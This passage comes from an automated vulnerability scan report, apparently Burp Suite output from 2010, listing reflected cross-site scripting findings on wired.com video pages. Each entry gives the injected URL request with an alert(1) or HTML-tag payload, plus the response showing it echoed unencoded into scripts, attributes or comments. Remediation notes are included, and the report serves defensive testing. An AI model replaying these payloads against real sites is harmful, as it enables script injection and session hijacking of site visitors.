Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:47:21 GMT
Date: Mon, 22 Nov 2010 00:42:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos64f6a"><a>256869a8c00 c_highlights">
...[SNIP]...

1.949. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7caa1"-alert(1)-"57600af85d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos7caa1"-alert(1)-"57600af85d9/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:26 GMT
Date: Mon, 22 Nov 2010 00:43:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-of-atts-distaster-response-team","1716440574","latest-videos7caa1"-alert(1)-"57600af85d9","highlights","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.950. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbc7"-alert(1)-"fc4917c5a16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights9fbc7"-alert(1)-"fc4917c5a16/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:49:13 GMT
Date: Mon, 22 Nov 2010 00:44:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","behind-the-scenes-of-atts-distaster-response-team","highlights9fbc7"-alert(1)-"fc4917c5a16","1716440574","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.951. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4a6"><a>cc8cfc6cb78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlightsaf4a6"><a>cc8cfc6cb78/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:48:06 GMT
Date: Mon, 22 Nov 2010 00:43:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlightsaf4a6"><a>cc8cfc6cb78">
...[SNIP]...

1.952. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47c96"-alert(1)-"6b39c469add was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/171644057447c96"-alert(1)-"6b39c469add/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:49:50 GMT
Date: Mon, 22 Nov 2010 00:44:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","171644057447c96"-alert(1)-"6b39c469add","behind-the-scenes-of-atts-distaster-response-team","highlights","video","648526227001"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.953. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76354"-alert(1)-"5b79ff964c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team76354"-alert(1)-"5b79ff964c2/648526227001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:07 GMT
Date: Mon, 22 Nov 2010 00:45:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106713


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
vascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","1716440574","highlights","video","648526227001","behind-the-scenes-of-atts-distaster-response-team76354"-alert(1)-"5b79ff964c2"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.954. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e566d"-alert(1)-"c72dc9190e1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001e566d"-alert(1)-"c72dc9190e1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:15 GMT
Date: Mon, 22 Nov 2010 00:45:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106777


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "648526227001e566d"-alert(1)-"c72dc9190e1","latest-videos","behind-the-scenes-of-atts-distaster-response-team","1716440574","highlights","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.955. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4d894--><script>alert(1)</script>cea20fcb24e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video4d894--><script>alert(1)</script>cea20fcb24e/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29463
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:19 GMT
Date: Mon, 22 Nov 2010 00:46:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video4d894--><script>alert(1)</script>cea20fcb24e/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001
-->
...[SNIP]...

1.956. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 201d0"><a>ebd28a3fec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video201d0"><a>ebd28a3fec/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29426
Vary: Accept-Encoding
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 00:50:32 GMT
Date: Mon, 22 Nov 2010 00:45:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video201d0"><a>ebd28a3fec ss_latest-videos c_highlights">
...[SNIP]...

1.957. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62258"-alert(1)-"919fafaaa81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos62258"-alert(1)-"919fafaaa81/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:26 GMT
Date: Mon, 22 Nov 2010 00:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "664893966001","1716440574","latest-videos62258"-alert(1)-"919fafaaa81","highlights","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.958. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52b9d"><a>211a0831db4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos52b9d"><a>211a0831db4/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:51:12 GMT
Date: Mon, 22 Nov 2010 00:46:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos52b9d"><a>211a0831db4 c_highlights">
...[SNIP]...

1.959. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8141"-alert(1)-"10ca6e21fc9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlightsc8141"-alert(1)-"10ca6e21fc9/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:32 GMT
Date: Mon, 22 Nov 2010 00:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "highlightsc8141"-alert(1)-"10ca6e21fc9","latest-videos","664893966001","1716440574","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.960. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84f6"><a>f02232e9b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/highlightsf84f6"><a>f02232e9b59/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:34 GMT
Date: Mon, 22 Nov 2010 00:47:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_highlightsf84f6"><a>f02232e9b59">
...[SNIP]...

1.961. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68f9c"-alert(1)-"1deb7ddd208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/highlights/171644057468f9c"-alert(1)-"1deb7ddd208/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:53:17 GMT
Date: Mon, 22 Nov 2010 00:48:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


